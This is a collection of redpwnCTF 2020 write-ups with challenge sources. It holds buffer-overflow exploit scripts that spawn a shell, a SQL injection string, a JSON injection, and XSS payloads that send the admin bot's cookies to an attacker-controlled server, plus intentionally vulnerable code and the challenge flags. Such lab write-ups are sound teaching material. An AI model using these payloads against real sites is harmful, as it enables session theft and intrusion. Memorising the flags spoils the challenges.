-------------------------------------------------------------------------------- 1 | # coffer-overflow-1 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | This is a simple buffer overflow challenge. 6 | 7 | # Requirements 8 | 9 | - Basic Buffer overflow. 10 | 11 | # Source 12 | 13 | - [coffer-overflow-1](./coffer-overflow-1). 14 | 15 | ``` 16 | The coffers keep getting stronger! You'll need to use the source, Luke. 17 | 18 | nc 2020.redpwnc.tf 31255 19 | ``` 20 | 21 | ```c 22 | #include 23 | #include 24 | 25 | int main(void) 26 | { 27 | long code = 0; 28 | char name[16]; 29 | 30 | setbuf(stdout, NULL); 31 | setbuf(stdin, NULL); 32 | setbuf(stderr, NULL); 33 | 34 | puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)"); 35 | puts("What do you want to fill your coffer with?"); 36 | 37 | gets(name); 38 | 39 | if(code == 0xcafebabe) { 40 | system("/bin/sh"); 41 | } 42 | } 43 | ``` 44 | 45 | # Exploitation 46 | 47 | Check out [coffer-overflow-0](../coffer-overflow-0) for some details. You can checkout how buffer overflow works [here](https://github.com/csivitu/Incore-Sessions/blob/master/Buffer%20Overflow/Session-1.md). 48 |
49 | 50 | We see in the code snippet that `name` is allotted 16 bytes, and `code` is allotted 8 bytes (a `long` on 64-bit). Also, the `gets()` function is used, which performs no bounds check on the input. So, we can simply write past the space allotted for `name` and write the value `0xcafebabe`, in little endian, into `code`. 51 |
52 | 53 | We can use `pwntools` for the same. As discussed in `coffer-overflow-0`, this function will take up 32 bytes in the stack. The last 8 will store `code`, so we can write 24 random characters followed by `0xcafebabe` in little endian. 54 | 55 | ```python 56 | import pwn 57 | 58 | r = pwn.remote('2020.redpwnc.tf', 31255) 59 | 60 | rep = b'a'*24 + pwn.p64(0xcafebabe) 61 | print(rep) 62 | r.sendline(rep) 63 | r.interactive() 64 | ``` 65 | 66 | Run this program using `python`. 67 | 68 | ```bash 69 | $ python cof1.py 70 | [+] Opening connection to 2020.redpwnc.tf on port 31255: Done 71 | b'aaaaaaaaaaaaaaaaaaaaaaaa\xbe\xba\xfe\xca\x00\x00\x00\x00' 72 | [*] Switching to interactive mode 73 | Welcome to coffer overflow, where our coffers are overfilling with bytes ;) 74 | What do you want to fill your coffer with? 75 | $ ls 76 | Makefile 77 | bin 78 | coffer-overflow-1 79 | coffer-overflow-1.c 80 | dev 81 | flag.txt 82 | lib 83 | lib32 84 | lib64 85 | $ cat flag.txt 86 | flag{th1s_0ne_wasnt_pure_gu3ssing_1_h0pe} 87 | ``` 88 | 89 | The flag is: 90 | 91 | ``` 92 | flag{th1s_0ne_wasnt_pure_gu3ssing_1_h0pe} 93 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/pwn/coffer-overflow-1/coffer-overflow-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/redpwnCTF 2020/pwn/coffer-overflow-1/coffer-overflow-1 -------------------------------------------------------------------------------- /redpwnCTF 2020/pwn/coffer-overflow-1/coffer-overflow-1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(void) 5 | { 6 | long code = 0; 7 | char name[16]; 8 | 9 | setbuf(stdout, NULL); 10 | setbuf(stdin, NULL); 11 | setbuf(stderr, NULL); 12 | 13 | puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)"); 14 | 
puts("What do you want to fill your coffer with?"); 15 | 16 | gets(name); 17 | 18 | if(code == 0xcafebabe) { 19 | system("/bin/sh"); 20 | } 21 | } 22 | 23 | -------------------------------------------------------------------------------- /redpwnCTF 2020/pwn/coffer-overflow-2/README.md: -------------------------------------------------------------------------------- 1 | # coffer-overflow-2 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | This is a simple buffer overflow challenge. 6 | 7 | # Requirements 8 | 9 | - Basic Buffer overflow. 10 | 11 | # Source 12 | 13 | - [coffer-overflow-2](./coffer-overflow-2). 14 | 15 | ``` 16 | You'll have to jump to a function now!? 17 | 18 | nc 2020.redpwnc.tf 31908 19 | ``` 20 | 21 | ```c 22 | #include 23 | #include 24 | 25 | int main(void) 26 | { 27 | char name[16]; 28 | 29 | setbuf(stdout, NULL); 30 | setbuf(stdin, NULL); 31 | setbuf(stderr, NULL); 32 | 33 | puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)"); 34 | puts("What do you want to fill your coffer with?"); 35 | 36 | gets(name); 37 | } 38 | 39 | void binFunction() { 40 | system("/bin/sh"); 41 | } 42 | ``` 43 | 44 | # Exploitation 45 | 46 | Check out [coffer-overflow-1](../coffer-overflow-1) for some details. You can checkout how buffer overflow works [here](https://github.com/csivitu/Incore-Sessions/blob/master/Buffer%20Overflow/Session-1.md). 47 |
48 | 49 | Here, we basically need to overwrite the return pointer of `main` so that it returns to `binFunction`. We know that `main` has a 16-byte stack buffer. You can get the address of `binFunction` using `gdb` or `objdump`. 50 | 51 | ``` 52 | $ objdump -d coffer-overflow-2 | grep binFunction 53 | 00000000004006e6 : 54 | ``` 55 | 56 | Now, write this address in little endian over the return pointer of `main`. That is, 16 filler characters, 8 more to overwrite the `saved rbp`, and then the address to overwrite the `saved rip`. 57 | 58 | ```python 59 | import pwn 60 | 61 | r = pwn.remote('2020.redpwnc.tf', 31908) 62 | 63 | rep = b'a'*16 + b'b'*8 + pwn.p64(0x004006e6) 64 | print(rep) 65 | r.sendline(rep) 66 | r.interactive() 67 | ``` 68 | 69 | Run this using `python`. 70 | 71 | ```bash 72 | $ python cof2.py 73 | [+] Opening connection to 2020.redpwnc.tf on port 31908: Done 74 | b'aaaaaaaaaaaaaaaabbbbbbbb\xe6\x06@\x00\x00\x00\x00\x00' 75 | [*] Switching to interactive mode 76 | Welcome to coffer overflow, where our coffers are overfilling with bytes ;) 77 | What do you want to fill your coffer with? 
78 | $ ls 79 | Makefile 80 | bin 81 | coffer-overflow-2 82 | coffer-overflow-2.c 83 | dev 84 | flag.txt 85 | lib 86 | lib32 87 | lib64 88 | $ cat flag.txt 89 | flag{ret_to_b1n_m0re_l1k3_r3t_t0_w1n} 90 | ``` 91 | 92 | The flag is: 93 | 94 | ``` 95 | flag{ret_to_b1n_m0re_l1k3_r3t_t0_w1n} 96 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/pwn/coffer-overflow-2/coffer-overflow-2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/redpwnCTF 2020/pwn/coffer-overflow-2/coffer-overflow-2 -------------------------------------------------------------------------------- /redpwnCTF 2020/pwn/coffer-overflow-2/coffer-overflow-2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(void) 5 | { 6 | char name[16]; 7 | 8 | setbuf(stdout, NULL); 9 | setbuf(stdin, NULL); 10 | setbuf(stderr, NULL); 11 | 12 | puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)"); 13 | puts("What do you want to fill your coffer with?"); 14 | 15 | gets(name); 16 | } 17 | 18 | void binFunction() { 19 | system("/bin/sh"); 20 | } 21 | 22 | -------------------------------------------------------------------------------- /redpwnCTF 2020/rev/bubbly/README.md: -------------------------------------------------------------------------------- 1 | # bubbly 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | A possible way to solve this challenge is decompiling the binary and trying to understand what's happening in the code. 6 | 7 | # Requirements 8 | 9 | - ghidra 10 | - gdb 11 | 12 | # Source 13 | 14 | - [bubbly](./bubbly). 15 | 16 | # Exploitation 17 | 18 | First, we checkout the decompiled version of this binary with the help of `ghidra`. 19 |
20 | 21 | disas main 22 | 23 | As you can see in the code, there is a `while(true)` loop which reads a number (`%d`) from `stdin` and stores it in `i`. There's also an array of numbers, `nums`. The code snippet involving `nums` simply swaps `nums[i]` with `nums[i+1]`. The `check` function checks whether the list is sorted. 24 |
25 | 26 | ```c 27 | _Bool check(void) 28 | 29 | { 30 | uint32_t i; 31 | _Bool pass; 32 | 33 | i = 0; 34 | while( true ) { 35 | if (8 < i) { 36 | return true; 37 | } 38 | if (nums[i + 1] < nums[i]) break; 39 | i = i + 1; 40 | } 41 | return false; 42 | } 43 | ``` 44 | 45 | The target is to keep swapping indices in `nums` to finally sort it as a list. So, we open gdb and find out what nums is. 46 | 47 | ```bash 48 | gdb-peda$ print nums 49 | $1 = {0x1, 0xa, 0x3, 0x2, 0x5, 0x9, 0x8, 0x7, 0x4, 0x6} 50 | ``` 51 | 52 | When you execute this line in `gdb`, you see that `nums` is a global array, consisting of numbers from 1 to 10. It is also important to notice in the `ghidra` decompiled code that the value of `i` entered by the user must be `<=8`, otherwise it will just break out of the `while(true)` loop. 53 |
54 | 55 | Now, we have to devise a strategy to sort these numbers by swapping indices `i` and `i+1` in `nums`. So, first we try to bring `0x2` (i.e. `2`) to its correct place by passing `2` followed by `1`. That swaps indices `2 with 3` and then `1 with 2`, bringing 2 to its correct place. We can perform these swaps in `gdb` and keep checking the result of each swap as we go. Here's a list of swaps that sorts the array. 56 | 57 | ``` 58 | 2 59 | 1 60 | 2 61 | 7 62 | 6 63 | 5 64 | 4 65 | 3 66 | 4 67 | 8 68 | 7 69 | 6 70 | 5 71 | 8 72 | 7 73 | 6 74 | 8 75 | 7 76 | 8 77 | 9 78 | ``` 79 | 80 | At the end of every iteration, the `check` function runs to check whether the list is sorted. Once it's sorted, we can break out of the loop, since `pass` is now equal to `true`. 81 |
82 | 83 | The list ends with a `9` so that we can break out of the `while` loop. Once it breaks out, it checks if the value of `pass` is `true`, which it is, and then it runs the `print_flag` function. Passing the numbers in the above list fetches us the flag. 84 | 85 | ```bash 86 | $ nc 2020.redpwnc.tf 31039 87 | I hate my data structures class! Why can't I just sort by hand? 88 | 2 89 | 1 90 | 2 91 | 7 92 | 6 93 | 5 94 | 4 95 | 3 96 | 4 97 | 8 98 | 7 99 | 6 100 | 5 101 | 8 102 | 7 103 | 6 104 | 8 105 | 7 106 | 8 107 | 9 108 | Well done! 109 | flag{4ft3r_y0u_put_u54c0_0n_y0ur_c011ege_4pp5_y0u_5t1ll_h4ve_t0_d0_th15_57uff} 110 | ``` 111 | 112 | The flag is: 113 | 114 | ``` 115 | flag{4ft3r_y0u_put_u54c0_0n_y0ur_c011ege_4pp5_y0u_5t1ll_h4ve_t0_d0_th15_57uff} 116 | ``` 117 | -------------------------------------------------------------------------------- /redpwnCTF 2020/rev/bubbly/bubbly: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/redpwnCTF 2020/rev/bubbly/bubbly -------------------------------------------------------------------------------- /redpwnCTF 2020/rev/bubbly/static/img1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/redpwnCTF 2020/rev/bubbly/static/img1.png -------------------------------------------------------------------------------- /redpwnCTF 2020/rev/ropes/README.md: -------------------------------------------------------------------------------- 1 | # ropes 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | This can be solved using `strings` in Linux. 
6 | 7 | # Requirements 8 | 9 | - `strings` command 10 | 11 | # Source 12 | 13 | - [ropes](./ropes) 14 | - [ropes (official)](https://redpwn.storage.googleapis.com/uploads/b896a5f99065a7df18d6ab3c6296c79f51f73ab0de3466944e08cbd2be4953fb/ropes) 15 | 16 | # Exploitation 17 | 18 | Run `strings` on the file to get the strings in the binary. 19 | 20 | ```bash 21 | $ strings ropes 22 | __PAGEZERO 23 | __TEXT 24 | __text 25 | __TEXT 26 | __stubs 27 | __TEXT 28 | __stub_helper 29 | __TEXT 30 | __cstring 31 | __TEXT 32 | __unwind_info 33 | __TEXT 34 | __DATA 35 | __nl_symbol_ptr 36 | __DATA 37 | __la_symbol_ptr 38 | __DATA 39 | __LINKEDIT 40 | /usr/lib/dyld 41 | /usr/lib/libSystem.B.dylib 42 | Give me a magic number: 43 | First part is: flag{r0pes_ar3_ 44 | Second part is: just_l0ng_str1ngs} 45 | @dyld_stub_binder 46 | @_printf 47 | @_puts 48 | @_scanf 49 | _mh_execute_header 50 | !main 51 | __mh_execute_header 52 | _main 53 | _printf 54 | _puts 55 | _scanf 56 | dyld_stub_binder 57 | ``` 58 | 59 | You can see there are 2 lines which contain the flag. 60 | 61 | ``` 62 | First part is: flag{r0pes_ar3_ 63 | Second part is: just_l0ng_str1ngs} 64 | ``` 65 | 66 | The flag is: 67 | 68 | ``` 69 | flag{r0pes_ar3_just_l0ng_str1ngs} -------------------------------------------------------------------------------- /redpwnCTF 2020/rev/ropes/ropes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/redpwnCTF 2020/rev/ropes/ropes -------------------------------------------------------------------------------- /redpwnCTF 2020/web/inspector-general/README.md: -------------------------------------------------------------------------------- 1 | # inspector-general 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | Basic source code challenge. 
6 | 7 | # Requirements 8 | 9 | - Viewing source of HTML 10 | 11 | # Source 12 | 13 | - https://redpwn.net/ 14 | 15 | # Exploitation 16 | 17 | Press `Ctrl + U` on your browser to view the source code of the `HTML` file. Search for `flag{...}`. 18 | 19 | ```html 20 | 21 | ``` 22 | 23 | The flag is: 24 | 25 | ``` 26 | flag{1nspector_g3n3ral_at_w0rk} 27 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/web/login/README.md: -------------------------------------------------------------------------------- 1 | # login 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | Basic SQL Injection. 6 | 7 | # Requirements 8 | 9 | - Basic knowledge of SQL Injection. 10 | 11 | # Source 12 | 13 | - https://login.2020.redpwnc.tf/ 14 | 15 | # Exploitation 16 | 17 | This is a beginner SQL Injection challenge. Just pass the username and the password as `' or 1=1 -- `, it will return the flag in an `alert`. 18 | 19 | disas main 20 | 21 | The flag is: 22 | 23 | ``` 24 | flag{0bl1g4t0ry_5ql1} 25 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/web/login/static/img1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/redpwnCTF 2020/web/login/static/img1.png -------------------------------------------------------------------------------- /redpwnCTF 2020/web/panda-facts/README.md: -------------------------------------------------------------------------------- 1 | # panda-facts 2 | 3 | Authors: [roerohan](https://github.com/roerohan), [thebongy](https://github.com/thebongy) 4 | 5 | Maybe we can call this JSON injection? 6 | 7 | # Requirements 8 | 9 | - Basic knowledge of Node.js. 
10 | 11 | # Source 12 | 13 | - [index.js](./index.js) 14 | - https://panda-facts.2020.redpwnc.tf/ 15 | 16 | # Exploitation 17 | 18 | ```javascript 19 | async function generateToken(username) { 20 | const algorithm = 'aes-192-cbc'; 21 | const key = Buffer.from(process.env.KEY, 'hex'); 22 | // Predictable IV doesn't matter here 23 | const iv = Buffer.alloc(16, 0); 24 | 25 | const cipher = crypto.createCipheriv(algorithm, key, iv); 26 | 27 | const token = `{"integrity":"${INTEGRITY}","member":0,"username":"${username}"}` 28 | 29 | let encrypted = ''; 30 | encrypted += cipher.update(token, 'utf8', 'base64'); 31 | encrypted += cipher.final('base64'); 32 | return encrypted; 33 | } 34 | ``` 35 | 36 | You really just need to notice this function. Notice that the token is not built as an object (`token.username = username`) and then serialized; it is formed by string interpolation: 37 | 38 | ``` 39 | const token = `{"integrity":"${INTEGRITY}","member":0,"username":"${username}"}` 40 | ``` 41 | 42 | This allows us to close the `"` with the string we pass and append a second `member` key with a non-zero value. The username is inserted into the JSON before it is encrypted, so encryption does not protect the structure of the token, and because `JSON.parse` keeps the last occurrence of a duplicate key, our `member` value overrides the original `"member":0`. 43 |
44 | 45 | We can just pass the username as `","member":"1` and then visit `/api/flag`. 46 | 47 | ``` 48 | { 49 | "success": true, 50 | "flag": "flag{1_c4nt_f1nd_4_g00d_p4nd4_pun}" 51 | } 52 | ``` 53 | 54 | The flag is: 55 | 56 | ``` 57 | flag{1_c4nt_f1nd_4_g00d_p4nd4_pun} 58 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/web/static-pastebin/README.md: -------------------------------------------------------------------------------- 1 | # static-pastebin 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | This challenge uses XSS to get the flag from the `admin bot`'s cookies. 6 | 7 | # Requirements 8 | 9 | - Basic Knowledge of XSS. 10 | - A web server where you can accept a request. 11 | 12 | # Source 13 | 14 | - https://static-pastebin.2020.redpwnc.tf/ 15 | 16 | # Exploitation 17 | 18 | First, try a random `

Hello

` tag to see if you can put HTML in your pastebin. You can see the `js` file in the page: 19 | 20 | ```javascript 21 | (async () => { 22 | await new Promise((resolve) => { 23 | window.addEventListener('load', resolve); 24 | }); 25 | 26 | const content = window.location.hash.substring(1); 27 | display(atob(content)); 28 | })(); 29 | 30 | function display(input) { 31 | document.getElementById('paste').innerHTML = clean(input); 32 | } 33 | 34 | function clean(input) { 35 | let brackets = 0; 36 | let result = ''; 37 | for (let i = 0; i < input.length; i++) { 38 | const current = input.charAt(i); 39 | if (current == '<') { 40 | brackets ++; 41 | } 42 | if (brackets == 0) { 43 | result += current; 44 | } 45 | if (current == '>') { 46 | brackets --; 47 | } 48 | } 49 | return result 50 | } 51 | ``` 52 | 53 | We can infer 2 things from this. 54 | 55 | - The content of the page is obtained from the URL, which is a base64 encoded form of the text you entered. 56 | - The `clean` function only copies a character through while its `brackets` counter is `0`, so text inside a normal `<...>` pair is dropped; it is a counter, not an HTML parser, and it never checks for the counter going negative. 57 | 58 | It is rather easy to break this clean function by adding an extra `>` at the start of your XSS script: the leading `>` is copied and drives the counter to `-1`, after which every later tag brings it back to `0` while the tag is being read, so the whole tag is copied through intact. Here's the payload: 59 | 60 | ``` 61 | > 62 | ``` 63 | 64 | Your payload has the following URL: 65 | 66 | ``` 67 | https://static-pastebin.2020.redpwnc.tf/paste/#PjxpbWcgc3JjPTEgaHJlZj0xIG9uZXJyb3I9ImphdmFzY3JpcHQ6ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9pcDpwb3J0P2Nvb2tpZT0nK2RvY3VtZW50LmNvb2tpZSI+PC9pbWc+ 68 | ``` 69 | 70 | You can simply set up a `netcat listener` using `nc -l port` on your server, and pass the link to the `Admin Bot` [here](https://admin-bot.redpwnc.tf/submit?challenge=static-pastebin&url=https%3A%2F%2Fstatic-pastebin.2020.redpwnc.tf%2Fpaste%2F%23PjxpbWcgc3JjPTEgaHJlZj0xIG9uZXJyb3I9ImphdmFzY3JpcHQ6ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9jc2l2aXQuY29tOjkwMDE%2FY29va2llPScrZG9jdW1lbnQuY29va2llIj48L2ltZz4%3D&message=The%20admin%20has%20visited%20your%20URL.). 
The admin bot is basically a headless chrome browser which has the flag in its cookies. When it visits your site, the XSS steals the cookies from the admin bot and sends them to your server. You get a request which looks like: 71 | 72 | ``` 73 | GET /?cookie=flag=flag{54n1t1z4t10n_k1nd4_h4rd} HTTP/1.1 74 | Host: ip:port 75 | Connection: keep-alive 76 | Upgrade-Insecure-Requests: 1 77 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/83.0.4103.0 Safari/537.36 78 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 79 | Accept-Encoding: gzip, deflate 80 | ``` 81 | 82 | The flag is: 83 | 84 | ``` 85 | flag{54n1t1z4t10n_k1nd4_h4rd} 86 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/web/static-static-hosting/README.md: -------------------------------------------------------------------------------- 1 | # static-static-hosting 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | This is another XSS challenge, similar to [this](../static-pastebin) one. 6 | 7 | # Requirements 8 | 9 | - Basic knowledge of XSS. 10 | - Server with SSL to accept a request. 11 | 12 | # Source 13 | 14 | - https://static-static-hosting.2020.redpwnc.tf/ 15 | 16 | # Exploitation 17 | 18 | This site allows you to write HTML, so it's basically shouting at you to perform an XSS attack. Similar to [static-pastebin](../static-pastebin), the URL of the webpage created actually consists of a base64 encoded form of the content of the page. We can see the `js` in the source. 
19 | 20 | ```javascript 21 | (async () => { 22 | await new Promise((resolve) => { 23 | window.addEventListener('load', resolve); 24 | }); 25 | 26 | const content = window.location.hash.substring(1); 27 | display(atob(content)); 28 | })(); 29 | 30 | function display(input) { 31 | document.documentElement.innerHTML = clean(input); 32 | } 33 | 34 | function clean(input) { 35 | const template = document.createElement('template'); 36 | const html = document.createElement('html'); 37 | template.content.appendChild(html); 38 | html.innerHTML = input; 39 | 40 | sanitize(html); 41 | 42 | const result = html.innerHTML; 43 | return result; 44 | } 45 | 46 | function sanitize(element) { 47 | const attributes = element.getAttributeNames(); 48 | for (let i = 0; i < attributes.length; i++) { 49 | // Let people add images and styles 50 | if (!['src', 'width', 'height', 'alt', 'class'].includes(attributes[i])) { 51 | element.removeAttribute(attributes[i]); 52 | } 53 | } 54 | 55 | const children = element.children; 56 | for (let i = 0; i < children.length; i++) { 57 | if (children[i].nodeName === 'SCRIPT') { 58 | element.removeChild(children[i]); 59 | i --; 60 | } else { 61 | sanitize(children[i]); 62 | } 63 | } 64 | } 65 | ``` 66 | 67 | The main thing we notice is that it removes `script` elements and allows only the following attributes on an element: `'src', 'width', 'height', 'alt', 'class'`. So we have to perform an XSS with these attributes: `src` survives sanitization, and an `iframe` whose `src` is a `javascript:` URL executes code without any `script` tag. So, here's the payload. 68 | 69 | ``` 70 | 71 | ``` 72 | 73 | Note that here, the site is supposed to be `https`, otherwise the browser will report a Content Security Policy (CSP) error and the request won't be sent. 
We can get the URL of the resulting webpage: 74 | 75 | ``` 76 | https://static-static-hosting.2020.redpwnc.tf/site/#PGlmcmFtZSBzcmM9ImphdmFzY3JpcHQ6ZG9jdW1lbnQubG9jYXRpb249J2h0dHBzOi8vbXlzZXJ2ZXIudGxkP2Nvb2tpZT0nK2RvY3VtZW50LmNvb2tpZSI+PC9pZnJhbWU+ 77 | ``` 78 | 79 | On the server, we can create a simple Node.js backend which accepts the cookie as a query param and logs it. 80 | 81 | ```javascript 82 | router.get('/cookie', (req, res) => { 83 | console.log(req.query.cookie); 84 | } 85 | ``` 86 | 87 | When the link for the website is sent to the `admin bot`, which is basically a headless chrome browser, it visits the page and its cookie is stolen and sent to the server at `myserver.tld`. The cookie stores the `flag`. 88 |
89 | 90 | The flag is: 91 | 92 | ``` 93 | flag{wh0_n33d5_d0mpur1fy} 94 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/web/tux-fanpage/index.js: -------------------------------------------------------------------------------- 1 | const express = require('express') 2 | const path = require('path') 3 | const app = express() 4 | 5 | //Don't forget to redact from published source 6 | const flag = '[REDACTED]' 7 | 8 | app.get('/', (req, res) => { 9 | res.redirect('/page?path=index.html') 10 | }) 11 | 12 | app.get('/page', (req, res) => { 13 | 14 | let path = req.query.path 15 | 16 | //Handle queryless request 17 | if(!path || !strip(path)){ 18 | res.redirect('/page?path=index.html') 19 | return 20 | } 21 | path = strip(path) 22 | 23 | path = preventTraversal(path) 24 | 25 | res.sendFile(prepare(path), (err) => { 26 | if(err){ 27 | if (! res.headersSent) { 28 | try { 29 | res.send(strip(req.query.path) + ' not found') 30 | } catch { 31 | res.end() 32 | } 33 | } 34 | } 35 | }) 36 | }) 37 | 38 | //Prevent directory traversal attack 39 | function preventTraversal(dir){ 40 | if(dir.includes('../')){ 41 | let res = dir.replace('../', '') 42 | return preventTraversal(res) 43 | } 44 | 45 | //In case people want to test locally on windows 46 | if(dir.includes('..\\')){ 47 | let res = dir.replace('..\\', '') 48 | return preventTraversal(res) 49 | } 50 | return dir 51 | } 52 | 53 | //Get absolute path from relative path 54 | function prepare(dir){ 55 | return path.resolve('./public/' + dir) 56 | } 57 | 58 | //Strip leading characters 59 | function strip(dir){ 60 | const regex = /^[a-z0-9]$/im 61 | 62 | //Remove first character if not alphanumeric 63 | if(!regex.test(dir[0])){ 64 | if(dir.length > 0){ 65 | return strip(dir.slice(1)) 66 | } 67 | return '' 68 | } 69 | 70 | return dir 71 | } 72 | 73 | app.listen(3000, () => { 74 | console.log('listening on 0.0.0.0:3000') 75 | }) 76 | 
--------------------------------------------------------------------------------